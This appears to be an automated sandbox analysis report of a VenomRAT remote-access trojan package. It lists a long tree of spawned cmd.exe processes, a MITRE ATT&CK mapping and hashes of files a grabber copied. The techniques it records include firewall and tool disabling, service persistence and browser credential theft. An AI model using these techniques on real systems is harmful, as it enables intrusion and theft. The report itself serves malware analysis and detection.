C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9372
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12428
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12676
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12816
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12116
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14172
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14212
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:12508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15272
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13428
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:13464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:14660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16424
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17008
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:15908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17172
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:16928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:17488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:18236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:19940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20116
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20292
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:20668
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:1056 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\ClientsFolder\127.0.0.1\Information\Information.txt2⤵PID:2908
-
Network
MITRE ATT&CK Enterprise v15
Persistence
- Account Manipulation 1
- Create or Modify System Process 2
  - Windows Service 2
- Event Triggered Execution 1
  - Netsh Helper DLL 1
Privilege Escalation
- Account Manipulation 1
- Create or Modify System Process 2
  - Windows Service 2
- Event Triggered Execution 1
  - Netsh Helper DLL 1
Defense Evasion
- Impair Defenses 2
  - Disable or Modify System Firewall 1
  - Disable or Modify Tools 1
- Modify Registry 1
- Subvert Trust Controls 1
  - SIP and Trust Provider Hijacking 1
Credential Access
- Credentials from Password Stores 1
  - Credentials from Web Browsers 1
- Unsecured Credentials 1
  - Credentials In Files 1
Discovery
- Browser Information Discovery 1
- Network Service Discovery 1
- Permission Groups Discovery 1
  - Local Groups 1
- Process Discovery 1
- Query Registry 4
- System Information Discovery 5
- System Location Discovery 1
  - System Language Discovery 1
- System Network Configuration Discovery 1
  - Wi-Fi Discovery 1
- System Network Connections Discovery 1
Downloads
SHA1d26617d37d3c44a0dfc225c9a9b438c9fbb67dae
SHA2568a4b87e5437a56940c6e3941de246d9c0febfe93589ee841c74283685fd607ce
SHA512181750d8a6f1f4f097999182fe8bb2f1f4b4f576004bc825d5cef1bc9457b31156a565ecf2e3fd635a45c8d76dc8a65a72c8390627c97b14d521fa00196a5b5d
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyCommands.cs
Filesize133B
MD5381f481ebe1396b8b822810286c37a00
SHA1f3d328db60e98257ab2548ad304fcb53900cc175
SHA25626c6d0b9711f2a12185bf88328da1ad4cea71ee78266d8e358a23bfab5e6af4a
SHA512895d6a8b1fd6465be798d8693981b98adec6a7fa72310e1f842046c2b1081a9e2935c1a5e1509bd21431185d1b81f3279201769aebff8f079034d72f69dd1adc
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyConnect.cs
Filesize167B
MD5b920e1118b8a15e365f92543d4218233
SHA14fb34abedde7814a3c7c58290b0afac22fb9449c
SHA256b0413a666bc601196aeec31e43f9c1f5ac46909285283363a92b07b9377fa415
SHA51277eb145b7f218b193c39ffb8735880afd2ba4f6c2b15fabe26372f71b7c91f959b5e7f490ce6dc70989f2ab05358aed5444a5b00115008701b3dd23791003204
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyConnectResponse.cs
Filesize309B
MD5442dfccaffae0de4b25ec3b8d8377f6f
SHA10c4b090ff6227d856cd0bd71ea502f22cd7a76d1
SHA2567335f88328c4d5951af68fbd8ac5706c1a217dd00efc201964dc74bbdd47dbfa
SHA512de6515852b7110f51002d4c2ccc61dca7c227a9bc7468f226a39e6b95b1430ef4bf981dbb9215150bd4e3416b89f2474313f01a7a54cbee52902559181e0d33b
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyData.cs
Filesize128B
MD56a2fae9ed2ed27953b6ef3d049d78d11
SHA13b26b4fd7c624593a8e6c5aff55b64e85c4b2e1d
SHA256f3eb8f7003ef84b0062ed4f6a42cda6d835aeafc820b155278daef281ee5a5f1
SHA51292eee89c555f35072327bf5c72ce695f7bb9636da4f5b6ac055b80590110f122d66943d1fa5b14b6857af3da78208a130c028e9249458e15b826c21bdaef6a75
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyDisconnect.cs
Filesize99B
MD58a57c36ab79ff6f251bf6225cc36f930
SHA174775da40da336bc493f38737b6d368bb5c1d989
SHA256bb299c3e47c6211cc135f8e66b9bf877ddf126ddc94b81f27ae0f2fc4e24cbd8
SHA512fbf5b8871fd256aec2299245c96d8db65c2f90cf0a3ae87b926b1a766798256ea15b37df1b0aa73fc72f920d9a49b3444707198f5f0204e5d32771e819d826e9
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyServer.cs
Filesize3KB
MD521e96715a31bafc4c4de31cbe4d452bd
SHA158b42379e2e1030a6a3610ad86e7610c2622e954
SHA2567b45a4e10c1c04d1cd00bca92c159b5c1ffee0df726ec1f481828c0198bc43ae
SHA512773b240f609bfabb60564ba1e67622da59a2a59dbf0c01d08388053e39673c442ea15e5452a5f62c2d9779d8bf1928112ed67472070a8cd7434153e89a3a4fb9
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Settings.cs
Filesize1KB
MD5d1407c09b8ae4a5b76b410bfd5db084b
SHA1a784a35f4890cdd4b9639572250b1e73e7caa2b8
SHA256adcb29c4d6b6e502e6581527a7431fc273b42490f9ddaca92a9c06adf51613e7
SHA512ec09d1a01aee6bfa6a905065b5979b7a98a115636a6cd50ed04d6178cc39776a9161d6eafe4f56cd2a6c5c499a0f3a09a34b26320af2bc1ae32a624197e38f05
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\AutoFill.cs
Filesize133B
MD506dd1b49d449bbdfd7bd4947c5dbdf5d
SHA1e29dbebeb6886c9ad8558204a36b9056fe964e87
SHA2562b696750c80d37c5f892b9480e895201e4052562ea86e4b412179a38755ccf39
SHA512e0a7cbac49ce2c33b19c9a048afd9c58d505c1751902eeacc7dc9147183c5d0c54d048f00bc43df9c018232058c4843c8068b125bb2126e3a81827b09986396e
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\Bookmark.cs
Filesize132B
MD54463fa44fad4e3cc45f77c7913cdb71e
SHA14c8ed2679ce33a8f791c1082d81f581f91a28ab8
SHA2567771734f8228683679aa79dbc6f9882b39a51d5f9b33d1c3d15b5412ac80d9b5
SHA51261e38e68a509fffddc6e9c8ae5e679171c59460bc30495307617dd28d2eb29f50076f902e727e0edb00ca8e3a25ac31124e5c73dcd27160dd256b75fa5952cfd
-
